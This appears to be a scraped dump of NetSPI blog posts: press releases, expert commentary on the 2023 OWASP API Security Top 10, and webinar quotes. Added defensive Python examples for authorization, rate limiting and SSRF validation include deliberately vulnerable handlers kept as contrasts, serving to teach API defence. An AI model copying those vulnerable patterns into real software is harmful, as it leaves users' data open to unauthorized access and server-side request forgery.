Minneapolis, MN – August 8, 2023 – NetSPI, the global leader in offensive security, today debuted its ML/AI Pentesting solution to bring a more holistic and proactive approach to safeguarding machine learning model implementations. The first-of-its-kind solution focuses on two core components: Identifying, analyzing, and remediating vulnerabilities on machine learning systems such as Large Language Models (LLMs) and providing grounded advice and real-world guidance to ensure security is considered from ideation to implementation.
As adoption of ML and AI accelerates, organizations must understand the unique threats that accompany this technology to better identify areas of weakness and build more secure models. NetSPI's testing methodology is rooted in adversarial machine learning, the study of adversarial attacks on ML and corresponding defenses. With this foundational research, the company’s offensive security experts have the knowledge to better understand and mitigate vulnerabilities within ML models by putting them to the test against real adversarial attack techniques.
“Securing technologies like ML/AI can be daunting, but our customers do not have to navigate the journey alone,” said Nick Landers, VP of Research at NetSPI. “Innovation in this space shows no signs of stopping – and we’re excited to bring our wealth of knowledge in machine learning, cybersecurity, and data science to help organizations navigate the emerging space with security top of mind. Our goal is not to slow innovation, but to help organizations innovate with confidence.”
NetSPI's ML/AI Pentesting solution caters to organizations seeking to enhance the robustness, trustworthiness, and security of their ML systems, with a particular focus on LLMs. During an assessment, customers can expect:
A dedicated partner through ideation, development, training, implementation, and real-world deployment
Holistic and contextual security testing across their tech stack, leveraging NetSPI’s application, cloud, and network security testing expertise
An evaluation of defenses against major attacks and tailored adversarial examples
Guidance on how to build a robust pipeline for development and training
Comprehensive vulnerability reports and remediation instructions delivered via NetSPI’s PTaaS platform
“Every new paradigm shift brings along a new set of opportunities and challenges, and the widespread adoption of LLMs is no different,” said Vinay Anand, Chief Product Officer at NetSPI. “There is no silver bullet for ML/AI security, yet securing these systems is paramount. Our new pentesting solution equips businesses with the knowledge, tools, and best practices needed to protect their machine learning systems from adversarial threats and improve overall resiliency to attacks.”
NetSPI will be available to discuss the new ML/AI Penetration Testing solution onsite at Black Hat USA from August 9-10. Schedule a meeting or meet the team at booth #1069.
NetSPI is the global leader in offensive security, delivering the most comprehensive suite of penetration testing, attack surface management, and breach and attack simulation solutions. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. Its global cybersecurity experts are committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with offices across the U.S., Canada, the UK, and India.
[post_title] => NetSPI Debuts ML/AI Penetration Testing, a Holistic Approach to Securing Machine Learning Models and LLM Implementations
[post_excerpt] => Read about NetSPI’s new ML/AI Penetration Testing solution and learn how partnering with the leader in offensive security can help you build more secure and robust models.
[post_modified] => 2023-08-21 08:51:45
[post_modified_gmt] => 2023-08-21 13:51:45
[guid] => https://www.netspi.com/?p=30754
)
[13] => WP_Post Object
(
[ID] => 30732
[post_author] => 91
[post_date] => 2023-08-03 09:00:00
[post_date_gmt] => 2023-08-03 14:00:00
[post_content] =>
The 2023 OWASP API Security Top 10 is out now — take a look! We summarized the changes below and gathered perspectives from application security pros and NetSPI partners on the biggest updates. Take a look at what changed and what industry leaders think about it.
Notable Updates from 2023 List
Remains in 1st place: API1:2023 – Broken Object Level Authorization
Remains in 2nd place: API2:2023 – Broken Authentication (renamed from Broken User Authentication)
Merged from API3:2019 – Excessive Data Exposure and API6:2019 – Mass Assignment: API3:2023 – Broken Object Property Level Authorization
Renamed from API4:2019 – Lack of Resources & Rate Limiting: API4:2023 – Unrestricted Resource Consumption
Remains in 5th place: API5:2023 – Broken Function Level Authorization
New: API6:2023 – Unrestricted Access to Sensitive Business Flows
New: API7:2023 – Server Side Request Forgery
Moved from 7th to 8th place: API8:2023 – Security Misconfiguration
Renamed from API9:2019 – Improper Assets Management: API9:2023 – Improper Inventory Management
New: API10:2023 – Unsafe Consumption of APIs
Dropped from the list: API8:2019 – Injection and API10:2019 – Insufficient Logging & Monitoring
Meet the Contributors
Based on these updates, we asked NetSPI partners and our Director of Application Pentesting, Paul Ryan, a few questions on the reasons behind these key themes and the importance of API security. Here’s what they said.
What conclusions can you draw from the updated list? Are there any key themes to call out?
“The common theme is all threat agents and attack vectors are at an easy exploitability level. If it’s that easy, watch out for the mass amount of bots attacking.”
– Mike Charobee, Cyber Buyer Founder
“Several vulnerabilities in the updated list are related to broken or insufficient authorization mechanisms, such as API1:2023, API3:2023 and API5:2023. This highlights the need for secure access controls at various levels throughout APIs, from the object to the functional level. API4:2023 and API6:2023 show the need for managing and restricting resources consumed by APIs. API9:2023 and API10:2023 illustrate the importance of maintaining an accurate inventory of APIs and managing third-party APIs securely.”
– Josh Smith, Cyber Threat Analyst and author of Nuspire’s quarterly Threat Report
“Proper authorization of APIs continues to be critical as it encompasses not only the top spot again, but a full three of the top 10 categories (API1, API3, API5). The second theme is the number of ’new’ vulnerability categories. While these are not ‘net new’ per se, they do represent that the API attack surface is changing: as companies move to protect and fix areas in the 2019 Top 10, attackers continue to adapt and focus on other areas.”
– Paul Ryan, NetSPI Director, Application Pentesting
“The changes are in direct response to the growing Digital Transformation move, as well as Containerization, and the plethora of needs APIs fulfill to meet these modernization demands. Couple this with the business pressures to adopt and implement a Digital Transformation strategy and the skills shortage in Cybersecurity, and DevOps teams are completing their tasks either by trusting the third-party API's security or by rushing development without adopting a security-by-design approach from the start.”
– Michael Yates, All Lines Technology Chief Information Security Officer
“When the first version of the OWASP Top 10 API Security list came out in 2019, the thing that most struck me was how few of the items on the list were conducive to detection by automated tools. Less than half would at least partially benefit from some sort of tooling-based detection.
In the 2023 version, it’s even worse. API7 – Server-Side Request Forgery (SSRF) is the only one remaining that can be completely or almost completely addressed by traditional AST tools. API8 – Security Misconfiguration can be partially addressed by emerging infrastructure as code (IaC) security tools, and there are tools that will help with API9 – Improper Inventory Management, which may be more recognizable as ‘shadow APIs.’
The rest are nearly impossible to automatically detect with automation because the design intent of the developer is a factor in all of them and, putting AI aside for a moment, determination of intent is not conducive to automation. Design and engineering excellence complemented by pentesting and threat modeling (all heavy on human effort) are how you address them.”
– Larry Maccherone, Contrast Security Dev[Sec]Ops Transformation Architect
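The three authorization categories the contributors above group together (API1, API3 and API5) come down to three distinct checks inside a handler: who may touch this object, which of its properties may be read or written, and who may invoke this operation at all. The Python below is an added example written for this page, not code from the post, from OWASP or from any of the quoted contributors. The users, orders and field allowlists are constructed sample data, and the vulnerable handler is kept next to the hardened ones to show what each check prevents.

```python
"""Object-, property- and function-level authorization (API1, API3, API5 of the 2023 list).

Added example for this page, not code from the original post, OWASP or the
quoted contributors. Users, orders and the field allowlists are constructed
sample data; a real service would load them from its identity and data layers.
"""

# Constructed sample data: two customers and one support agent.
USERS = {
    "u-alice": {"role": "customer"},
    "u-bob": {"role": "customer"},
    "u-agent": {"role": "support"},
}
ORDERS = {
    101: {"owner": "u-alice", "items": ["widget"], "status": "shipped", "internal_margin": 0.42},
    102: {"owner": "u-bob", "items": ["gadget"], "status": "pending", "internal_margin": 0.31},
}

PUBLIC_FIELDS = ("items", "status")   # property-level allowlist for responses (API3)
CUSTOMER_WRITABLE = {"items"}          # property-level allowlist for updates (API3)


class Forbidden(Exception):
    """Authorization failure; an HTTP layer would map this to 403 or 404."""


def _role(caller: str) -> str:
    return USERS.get(caller, {}).get("role", "anonymous")


# Vulnerable pattern the list describes: the handler trusts the client-supplied
# id (API1) and serialises the whole record (API3).
def get_order_vulnerable(caller: str, order_id: int) -> dict:
    return dict(ORDERS[order_id])     # any logged-in user reads any order, margin included


# Hardened handlers.
def get_order(caller: str, order_id: int) -> dict:
    order = ORDERS.get(order_id)
    # Object-level check (API1): the caller owns the object or holds a privileged role.
    # Missing and foreign ids fail the same way so ids cannot be enumerated.
    if order is None or (order["owner"] != caller and _role(caller) != "support"):
        raise Forbidden("order not accessible")
    # Property-level filtering (API3): only the allowlisted fields leave the server.
    return {k: order[k] for k in PUBLIC_FIELDS}


def update_order(caller: str, order_id: int, patch: dict) -> dict:
    order = ORDERS.get(order_id)
    if order is None or order["owner"] != caller:
        raise Forbidden("order not accessible")
    # Mass-assignment defence (API3): reject, rather than silently drop, fields
    # outside the allowlist, so a client cannot set status or internal_margin.
    disallowed = set(patch) - CUSTOMER_WRITABLE
    if disallowed:
        raise Forbidden(f"fields not writable: {sorted(disallowed)}")
    order.update(patch)
    return get_order(caller, order_id)


def refund_order(caller: str, order_id: int) -> str:
    # Function-level check (API5): the role gates the operation itself, not the
    # URL path or HTTP verb a client happened to use.
    if _role(caller) != "support":
        raise Forbidden("refund requires support role")
    if order_id not in ORDERS:
        raise Forbidden("order not accessible")
    ORDERS[order_id]["status"] = "refunded"
    return ORDERS[order_id]["status"]
```

Two design choices are worth calling out. The object-level check returns the same error for a missing id and for someone else's id, so an attacker iterating ids learns nothing from the response. The update path rejects unknown fields instead of ignoring them; silently dropping them hides client bugs and, more importantly, hides probing for writable internal properties.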
There are FIVE new vulnerabilities on the list, why do you think these have become more prevalent?
“Lack of resource and rate limiting (2019) has been renamed and separated to become API4 and API10; but throttling limits continue to be overlooked in API security. Also, API10 in particular is interesting as it represents how applications are very rarely siloed. Vulnerabilities in APIs can have both north-south and east-west effects that impact other interconnected systems which consume them.”
– Paul Ryan, NetSPI Director, Application Pentesting
“Here are a few thoughts I have. But take it like opinions on music. There is a little bit of country and a lot of rock and roll.
API2:2023 – Broken Authentication: This one is a no brainer. Authentication is the gold standard of security. You have to be able at a baseline level to know who, what, when, and how someone accesses anything. Many times, developers, security analysts, IT admin, and so on are not keeping authentication tokens updated and managed properly. This leads to temporary or permanent identification takeover.
API4:2023 – Unrestricted Resource Consumption: This is like allowing my kids to have as much ice cream as they want. Or at least until the ice cream runs out. Leaving me with no ice cream when I need it at 2 am. You do not want to see me with no ice cream at 2 am. APIs are processes. Processes need resources. Memory, CPU, Bandwidth, and Storage. Unchecked resource requests can overrun your APIs causing systems to crash. Crashed systems cost money and loss of revenue which is not a good combination. It can also lead to denial-of-service attacks.
API7:2023 – Server Side Request Forgery: The old “Switch-A-Roo". API request that doesn’t ask for or check the returning URI. Allowing a change of address. This can also bypass firewalls and VPNs as most are not configured to check for malicious URI via API. My kids used to do this with their Christmas presents sometimes. Move a name tag from one gift to another in hopes that they get the new Nintendo Switch and not a box of tighty-whities.
API10:2023 – Unsafe Consumption of APIs: This might be one of the most important areas for the DevOps and InfoSec teams to communicate. You might have tight security with your APIs, but you must demand that same of the APIs you are interacting with. Developers, develop. It's in their name. It’s their nature. It's what they do. One of the most creative, efficient, and trusting groups of people you will ever meet. Sometimes too trusting. It's exciting to hook up with a new API. It looks good. It swiped on you; you swiped back. Now let's meet for coffee. Then the API shows up. Clearly using a different photo. But now you are there paying for their coffee. What's the old Ronald Reagan quote? Trust but verify. That needs to be tattooed on anyone who develops APIs.
I encourage all my DevOps and InfoSec friends to go give this a read. More information is available on the official website. Not as fun to read, but more technical with information that may keep your company, your team, and you out of the news.”
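The API4:2023 point in the quote above is that every request costs memory, CPU, bandwidth or storage, and nothing bounds how much one caller may demand. The Python below is an added example for this page, not code from the post or from the quoted contributor. It runs the cheap guards (payload size, page size) before any real work, then charges a per-client token bucket a cost proportional to the work requested. The limits, the client keys and the simulated clock passed in as `now` are constructed assumptions; a real service would take them from configuration and the system clock.

```python
"""Bounding per-caller resource use (API4:2023, Unrestricted Resource Consumption).

Added example, not code from the original post. The limits, the client
keys and the simulated clock `now` are constructed for illustration.
"""
from __future__ import annotations
from dataclasses import dataclass, field

MAX_BODY_BYTES = 64 * 1024   # assumed cap on request payload size
MAX_PAGE_SIZE = 100          # assumed cap on records returned per call


@dataclass
class TokenBucket:
    """Token bucket: `capacity` tokens of burst, refilled at `rate` tokens/second."""
    capacity: float
    rate: float
    tokens: float = field(init=False)
    last: float = field(init=False)

    def __post_init__(self) -> None:
        self.tokens = self.capacity   # a new client starts with a full bucket
        self.last = 0.0

    def refill(self, now: float) -> None:
        elapsed = max(0.0, now - self.last)
        self.tokens = min(self.capacity, self.tokens + elapsed * self.rate)
        self.last = now

    def take(self, now: float, cost: float) -> bool:
        self.refill(now)
        if self.tokens >= cost:
            self.tokens -= cost
            return True
        return False

    def retry_after(self, cost: float) -> float:
        """Seconds until `cost` tokens will be available (0 if they already are)."""
        return max(0.0, (cost - self.tokens) / self.rate)


class RateLimiter:
    """One bucket per client key (API key, user id or source address)."""

    def __init__(self, capacity: float, rate: float) -> None:
        self.capacity, self.rate = capacity, rate
        self.buckets: dict[str, TokenBucket] = {}

    def bucket(self, client: str) -> TokenBucket:
        return self.buckets.setdefault(client, TokenBucket(self.capacity, self.rate))


def handle_list_orders(limiter: RateLimiter, client: str, now: float,
                       body: bytes, page_size: int) -> tuple[int, dict]:
    """Simulated endpoint: returns (HTTP status, response body).

    Cheap guards run before any expensive work, and the rate-limit cost
    scales with the work requested, so a large page spends more budget.
    """
    if len(body) > MAX_BODY_BYTES:
        return 413, {"error": "payload too large"}
    if not 1 <= page_size <= MAX_PAGE_SIZE:
        return 400, {"error": f"page_size must be between 1 and {MAX_PAGE_SIZE}"}
    cost = 1.0 + page_size / MAX_PAGE_SIZE
    bucket = limiter.bucket(client)
    if not bucket.take(now, cost):
        return 429, {"error": "rate limit exceeded",
                     "retry_after_s": round(bucket.retry_after(cost), 3)}
    # Bounded work: at most MAX_PAGE_SIZE records are ever produced.
    return 200, {"orders": [f"order-{i}" for i in range(page_size)]}
```

The ordering matters: a 64 KB cap on the body and a cap on page size are checked before the bucket is touched, so an oversized request costs the server almost nothing, and the cost weighting means a caller asking for full pages exhausts its budget faster than one asking for single records. The `retry_after_s` value is what a `Retry-After` header would carry.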
“These new vulnerabilities reflect the shifts in the threat landscape and emerging preferred/new attack vectors. Increases in automation and digitization have spurred surges in API usage worldwide. When not properly managed, APIs can become an attack vector for things such as denial of service attacks (API4:2023), misuse of functionalities (API6:2023), exploitation of weaknesses in the way APIs interact with services (API7:2023) and vulnerabilities from third-party integrations (API10:2023). And properly managing APIs is easier said than done, given how many exist today and the number of versions for each one (API9:2023). These are real threats affecting organizations, and due to their challenges and severity, OWASP has included them within this list.”
– Josh Smith, Cyber Threat Analyst and author of Nuspire’s quarterly Threat Report.
“I only consider one and a half of them as truly “new.” API7:2023 replaces API8:2019 and API10:2023 replaces API10:2019. The other three are merely wording refinements, or, in the case of API3:2023, a merging of two from the 2019 list. There was a release candidate in March 2023 that showed five as “new” but there were changes made before the final, driven by sharp feedback against the release candidate, and some of those that were labeled as “new” were essentially refinements of a roughly equivalent item from the 2019 list.
As I said, most of the difference is refinement in wording and scope.
Let’s discuss those one and a half that are ‘new’ one at a time:
The half-new. API7:2023 – Server-Side Request Forgery (SSRF) replaces API8:2019 – Injection flaws. The relative incidence of vulnerabilities of these two types has not changed much from 2019 to 2023, so I assume this change is mostly driven by an increase in the volume of attacks we’re seeing against SSRF vulnerabilities. SSRF attacks are newer than injection attacks and it has taken a while for attackers to understand how to exploit them. This also makes sense as more container-based systems come online.
I see this as only ‘half new’ because the committee seemed to think that ‘Injection is now essentially part of API7:2023 – Security Misconfiguration’. That’s a huge stretch. While a small portion of injection attacks can be prevented with configuration changes, injection attacks are much more a function of code than configuration.
The full-new. API10:2023 – Unsafe Consumption of APIs replaces API10:2019 – Insufficient Logging & Monitoring. You would expect changes to occur at the bottom of the list and we don’t know if API10:2019 moved down to #11 or #111 so this is not a dramatic change.”
– Larry Maccherone, Contrast Security Dev[Sec]Ops Transformation Architect
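Both the quote above and the earlier one describe API7:2023 the same way: the server fetches a URL it was handed without checking where that URL actually leads, which puts cloud metadata endpoints and anything else on the internal network in scope. The Python below is an added example for this page, not code from the post, from OWASP or from the contributors, showing the validation an outbound-fetch helper should perform before it connects. The scheme and host allowlists, the stand-in DNS table (so the example runs offline) and the sample addresses in it are assumptions; a real service would resolve with the system resolver and then connect to the pinned address it validated.

```python
"""Outbound-URL validation against SSRF (API7:2023, Server Side Request Forgery).

Added example, not code from the original post. The allowlists, the stand-in
DNS table and the addresses in it are constructed for illustration.
"""
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"https"}
ALLOWED_HOSTS = {"api.partner.example", "cdn.partner.example"}   # assumed allowlist

# Constructed stand-in for DNS so the example runs offline. The second entry
# mixes a public address with a private one, the shape a rebinding or
# split-horizon trick produces; the addresses are not real partner hosts.
FAKE_DNS = {
    "api.partner.example": ["93.184.216.34"],
    "cdn.partner.example": ["151.101.1.69", "10.0.0.5"],
    "metadata.internal": ["169.254.169.254"],
}


class UnsafeURL(ValueError):
    """The URL failed one of the outbound checks; the request must not be made."""


def _is_public(ip: str) -> bool:
    # is_global rejects RFC 1918, loopback, link-local (169.254/16, where cloud
    # metadata services live), multicast, reserved and the documentation ranges.
    return ipaddress.ip_address(ip).is_global


def validate_outbound_url(url: str, resolve=None) -> str:
    """Return the pinned IP the caller must connect to, or raise UnsafeURL.

    Checks, in order: scheme allowlist, no embedded credentials, exact host
    allowlist (not a substring match), default port only, and every resolved
    address public. The caller must connect to the returned IP (with SNI and
    Host set to the name) and must not follow redirects, otherwise a 302 to
    http://169.254.169.254/ reopens the hole this function closes.
    """
    resolve = resolve or (lambda h: FAKE_DNS.get(h, []))
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise UnsafeURL(f"scheme {parts.scheme!r} not allowed")
    if parts.username or parts.password:
        raise UnsafeURL("credentials embedded in URL")
    host = (parts.hostname or "").rstrip(".").lower()
    if host not in ALLOWED_HOSTS:
        raise UnsafeURL(f"host {host!r} not in allowlist")
    if parts.port not in (None, 443):
        raise UnsafeURL("non-default port")
    ips = resolve(host)
    if not ips:
        raise UnsafeURL("host does not resolve")
    for ip in ips:
        if not _is_public(ip):
            raise UnsafeURL(f"{host} resolves to non-public address {ip}")
    return ips[0]


# The vulnerable pattern the list item describes: whatever host the client
# supplies is the host the server will talk to.
def vulnerable_fetch_target(url: str) -> str:
    return urlsplit(url).hostname or ""
```

The check on resolved addresses is what separates this from a plain string allowlist: a name on the allowlist is still unsafe if it resolves, even partly, to a private range, and the pinned IP is returned precisely so the connection cannot be made to a different answer from a second lookup. Redirect handling is the other common gap; the fetch that follows this validation must treat a 3xx as a failure, not as a new URL to follow.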
What factors are impacting these changes?
“With the increasing use of APIs, more vulnerabilities emerge. API interactions are becoming more and more complex, allowing potential misconfigurations, inventory management issues and third-party risk from third-party service APIs.”
– Josh Smith, Cyber Threat Analyst and author of Nuspire’s quarterly Threat Report
“Not enough time to thoroughly investigate these threats and their tasks need to be persistently checked.”
– Mike Charobee, Cyber Buyer Founder
“The demand for more complex and more interconnected information systems as well as tailor-made data sets are requiring development teams to expose APIs to their applications and data. Along with this demand is the requirement to build, maintain, and (usually as an afterthought) protect these APIs. The changes seen in the Top 10 are due to a combination of more available APIs and a lack of resources or awareness to protect them.”
– Paul Ryan, NetSPI Director, Application Pentesting
"Refinement of wording and scope is the primary factor of change. Not all of that refinement has gone in the right direction though as I don’t see how Injection attacks can be considered mostly covered by Security Misconfiguration.”
– Larry Maccherone, Contrast Security Dev[Sec]Ops Transformation Architect
Why is API security important? What’s the risk of an insecure API?
“API security is crucial to an organization’s cybersecurity posture because these APIs act as a gateway to an organization’s data and services. An insecure API can lead to the exposure of sensitive data and data breaches. It could allow unauthorized access to critical business functionalities, causing misuse or disruption of services. APIs also could provide a threat actor initial access into a network to carry out further attacks. With how interconnected organizations are, an insecure API could put a single organization at risk and the organizations they interact with. API attacks could lead to loss of data, damage to a company’s reputation, financial loss and loss of customer trust.”
– Josh Smith, Cyber Threat Analyst and author of Nuspire’s quarterly Threat Report
“The majority of businesses never check their API security. 'Don’t expect what you don’t expect.'”
– Mike Charobee, Cyber Buyer Founder
“APIs act as gateways to the functions and data within an organization; they need to be protected with the same level of rigor as other applications or database systems. Like application security, cloud security, and mobile security, organizations need to recognize the importance of API security in their overall security program. Not validating the security of APIs leaves the gate open to attackers to try to exploit any of the previous or “new” Top 10.”
– Paul Ryan, NetSPI Director, Application Pentesting
“API security enables the protection of the availability, integrity, and confidentiality of the business-critical applications and sensitive data the API was designed to communicate. Not only the company data but also third-party data is at risk. Given the rise of cyber-attacks, whether criminal or nation-state, and the explosion of API use, the risk of an incident or breach is imminent unless DevOps standards include the design, implementation, and continuous monitoring and maintenance of API security.”
– Michael Yates, All Lines Technology Chief Information Security Officer
“Most people think of applications from the perspective of the UI. However, all those UIs speak through APIs to where the real risk resides, on the server or in the cloud. This is not news to application security experts and tooling vendors. The vast majority of what every application security vendor does is at the API level.
So, while it’s hip to think of API Security as a new category, it’s not.
You do more to protect your application by focusing on traditional application security. All of the so-called API Security Top 10 items, with one exception, are best addressed with traditional application security thinking (threat modeling, pen testing, AST tools, etc.).
The one exception is shadow APIs (aka API9:2023 - Improper Inventory Management). These are APIs that your development teams are putting out there that security has no prior knowledge of. There are specialist tools, and free alternatives, that will help you discover these. Those same API specialist tools also attempt to do things that more established AST tool vendors do but they are a generation behind, so you are better off not using them.
Also, as an established application security tool vendor, we’re not sitting idly by. We’re working on major functionality right now that will help address not just shadow APIs but other ways in which the applications your organization has built behave differently than you expected.”
– Larry Maccherone, Contrast Security Dev[Sec]Ops Transformation Architect
Reliance on APIs is only going to continue, making the security of those APIs a prime area to focus. Inventorying APIs and evaluating them against the OWASP API Security Top 10 is a lot easier with the right partner clearing your way. Take a look at NetSPI’s API penetration testing services and get in touch with us for a quote.
This post was written in collaboration with NetSPI’s Partners. Learn more about becoming a NetSPI partner here.
[post_title] => Industry Leaders Weigh in on the 2023 OWASP API Security Top 10
[post_excerpt] => We asked NetSPI’s Partners for their take on the latest changes to the 2023 OWASP API Security Top 10. Here’s what they said.
[post_modified] => 2023-08-02 11:05:08
[guid] => https://www.netspi.com/?p=30732
)
[14] => WP_Post Object
(
[ID] => 30679
[post_date] => 2023-07-25 09:30:00
[post_content] =>
Offensive security leader brings proactive security to Microsoft 365 and Salesforce environments, supporting discovery and remediation of SaaS vulnerabilities and misconfigurations.
Minneapolis, MN – July 25, 2023 — NetSPI, the global leader in offensive security, today unveiled its Software as a Service (SaaS) Security Assessment, bringing proactive security to Microsoft 365 and Salesforce environments. NetSPI’s SaaS Security Assessment leverages both automated and manual testing methods developed from years of industry-leading application and cloud assessments to discover and help remediate vulnerabilities and misconfigurations.
SaaS applications play a critical role in attack surface expansion as businesses continue to increasingly depend on them for critical operations and data management. Yet, 81% of organizations have sensitive SaaS data exposed. Delivered on NetSPI’s Penetration Testing as a Service (PTaaS) platform, the SaaS Security Assessments include real-time reporting, remediation guidance, project management and communication, as well as the ability to track data and discover vulnerability trends.
“SaaS security is imperative, but it’s often overlooked due to organizations’ false assumption that SaaS vendors will protect customer data and app usage – creating a major blind spot for security teams, and increased opportunity for malicious actors,” said Karl Fosaaen, Vice President of Research at NetSPI. “As the attack surface continues to evolve and expand, protecting SaaS apps must become an integral part of businesses’ security strategy. Our application and cloud pentesting expertise puts us ahead of the curve and brings unparalleled insights to the SaaS security market at a time when it’s needed most.”
NetSPI’s SaaS Security Assessment addresses:
Identity & Access Management – Ensuring only authorized users have access to SaaS applications
Data Management – Protecting every form of data in an organization’s possession
Data Storage – Protecting where data is stored
Email Security – Protecting applications from unauthorized access through email account attack vectors
Account Protection – Maintaining account integrity and confidentiality
Password Security – Ensuring password policies follow industry best practices
Integrations – Validating the security of third-party integrations
The service is currently being offered for Salesforce and Microsoft 365 in accordance with industry standards such as CIS Benchmarks, with additional security checks derived from NetSPI’s extensive experience in testing these environments.
To learn more about NetSPI’s SaaS Security Assessments, or its comprehensive offensive security solutions, please visit www.netspi.com.
About NetSPI
NetSPI is the global leader in offensive security, delivering the most comprehensive suite of penetration testing, attack surface management, and breach and attack simulation solutions. Through a combination of technology innovation and human ingenuity, NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. Its global cybersecurity experts are committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with offices across the U.S., Canada, the UK, and India. Follow NetSPI on Facebook, Twitter, and LinkedIn.
The following strategies help your business not only prepare for LOTL attacks but also reduce threat actors’ opportunities to compromise your legitimate systems.
Use LOLBINS To Track Binary Activity
The Living Off the Land Binaries, Scripts, and Libraries (LOLBAS) project offers a comprehensive catalog of legitimate system binaries, scripts, and libraries that attackers abuse. It’s best to study one binary (LOLBIN) at a time, examining how the specific program is typically used. Once your team knows what appropriate usage looks like, you can begin identifying abnormal behavior from that program.
Derek Wilson, principal consultant at security firm NetSPI, underscored the importance of using this resource. “By finding a way to baseline detections against something like the Living Off the Land Binaries And Scripts (LOLBAS) project, which is set up to track LOTL threats, teams can then build proactive detection plans for the procedures that aren’t caught,” he said.
Wilson recommended additional software to help teams develop general detection methods. “Breach and attack simulation (BAS) tools are invaluable in baselining detective controls and continuously improving detection of LOTL attacks,” he said. BAS tools give security teams insight into an attack lifecycle, behaving like a threat actor might to find security weaknesses more quickly.
In this episode I had a chance to talk with Nabil Hannan about rethinking your penetration testing strategy and moving towards Attack Surface Management. Nabil is the Field Chief Information Security Officer for NetSPI and has a ton of useful information to share about starting this journey.
Talking points include:
What are the biggest misconceptions with pentesting?
The problem with buying security 'things'
Understanding your Attack Surface using Breach and Attack Simulations
We hosted the crew from Hacker Valley Media on LinkedIn Live for a conversation on the top takeaways gained from our 2023 Offensive Security Vision Report. The report analyzed over 300,000 anonymized findings from thousands of pentest engagements to shed light on the state of offensive security and provide insights into how security teams can tangibly approach the evolving threat landscape.
NetSPI Head of Product Cody Chamberlain and guests Ron Eddings and Chris Cochran from Hacker Valley Media explored the highlights including the importance of prioritizing vulnerabilities, a constant reminder to focus on the basics, and how we can show empathy by asking for help while staying committed to the larger mission that keeps us connected: security.
These quotes come directly from Cody Chamberlain, Ron Eddings and Chris Cochran while participating in our LinkedIn Live webinar, “An Inside Look at NetSPI’s Offensive Security Vision Report.” We pulled these soundbites because they capture the state of offensive security in today’s landscape.
We’d love to hear what you’d add to this list! Share your two cents on the state of offensive security by tweeting us @NetSPI.
Prioritizing Remediation Efforts is the Key to Success
“You have to find the needle in the haystack on which vulnerability to focus on. Unfortunately, it's like finding the needle inside the needle stack. When the needle looks like all the other needles, how do you really find it?”
“Prioritization is one of those beasts that’s just hard to wrangle.”
“If you don't have a mechanism to prioritize, you'll be lost. You'll prioritize the wrong things, and ultimately, waste time.”
Prioritizing vulnerabilities is crucial in breaking the cycle of vulnerability management challenges. Security teams simply can’t fix every vulnerability. Rather, they must focus on which vulnerabilities pose the greatest risk if exploited based on where they exist, the business priorities, the likelihood of exploitation, and the threat landscape.
Without effective prioritization, security teams are faced with a constant influx of alerts and information, leading to analysis paralysis and misused time. Prioritization allows teams to allocate their precious time and resources to fix critical and high-risk vulnerabilities, ensuring that the most impactful security issues are addressed first. However, establishing a prioritization mechanism requires initial effort and a willingness to ask and answer difficult questions upfront.
Go Back to the Basics
“You want to play but you’ve got to clean your room before you play, right? You have to make sure you don't have any public-facing S3 buckets before you start playing with ChatGPT.”
“It's just another reminder that we really need to focus on the basics.”
“Going back to those fundamentals is what's going to lead to success.”
While the allure of new technologies is enticing, focusing on the basics and maintaining foundational security measures is essential to prevent breaches. Time and time again we find breaches happen because of simple mistakes that get overlooked.
Security teams must strike a balance between addressing business-as-usual security tasks and exploring new technologies that keep teams engaged and motivated, while also ensuring that the necessary groundwork is laid before diving into the latest trends. By achieving a mature security posture through focusing on fundamentals, organizations gain the freedom to explore new technologies and initiatives with a solid foundation in place.
Compliance Does Not Equal Security
“In our hearts, compliance does not equal security. But compliance gets a lot of budget, which helps us do security.”
NetSPI’s Vision Report explored high-level industry data on vulnerabilities and security, showing the government, non-profit, and healthcare industries had the largest volume of critical and high severity vulnerabilities. On the other hand, the insurance and financial services industries had the lowest volume.
This indicates a stark contrast between two highly regulated industries: healthcare and financial services.
Healthcare security leaders have expressed challenges in keeping up with privacy regulations, while the financial services industry has leaned into evaluating and penalizing risk management deficiencies. Perhaps the healthcare industry will follow suit toward stricter enforcement.
Plan for Hiring Early On
“A lot of times when you build your hiring plan, you don't necessarily think, ‘okay, I'm going to need to articulate the value of someone entry level to my stakeholders.’”
This situation can result in a harder sell for an entry-level hire when the need arises. Results from the Offensive Security Vision Report reveal a pressing need for increased investment in entry-level cybersecurity roles. A significant majority of security leaders (55 percent) reported having five or fewer roles budgeted for in 2023.
Moreover, when asked about the number of entry-level positions, 71 percent of respondents indicated that less than one-fourth of the budgeted roles were allocated for entry-level candidates, and 46 percent had no plans for entry-level hiring in 2023. These findings underscore the urgency for the industry to prioritize investment in cultivating new talent. To address the global skills gap, it is crucial to provide hands-on training and support for individuals entering the cybersecurity field. By investing in entry-level professionals, the industry can move toward bridging the gap and fostering a robust pipeline of skilled cybersecurity experts.
Consider the Interconnected Nature of Your Role
“The work we do is in the weeds. It's asset management. It's vulnerability management. It's thankless, it's frustrating. So anything that we as an industry can do to remind each other that there is a mission — there’s a bigger mission than all of us — is appreciated because security is interconnected.”
While it's easy to get lost in the details on which vulnerabilities deserve the bulk of our attention, we need to stay grounded in the bigger picture: it’s not just about checking the box on a single task, but seeing how your effort fits into the larger picture of creating a secure end state for a business.
[post_title] => 9 Quotes that Capture the State of Offensive Security
[post_excerpt] => These quotes from NetSPI and Hacker Valley Media’s LinkedIn Live webinar discuss highlights from NetSPI’s 2023 Offensive Security Vision Report.
[post_modified] => 2023-06-27 11:46:29
[guid] => https://www.netspi.com/?p=30456
)
[18] => WP_Post Object
(
[ID] => 30404
[post_date] => 2023-06-21 09:00:00
[post_content] =>
During Infosecurity Europe 2023, NetSPI Field CISO Nabil Hannan caught up with Sean Martin of ITSP Magazine to discuss API security, attack surface management, and more. Listen to the podcast here.
+++
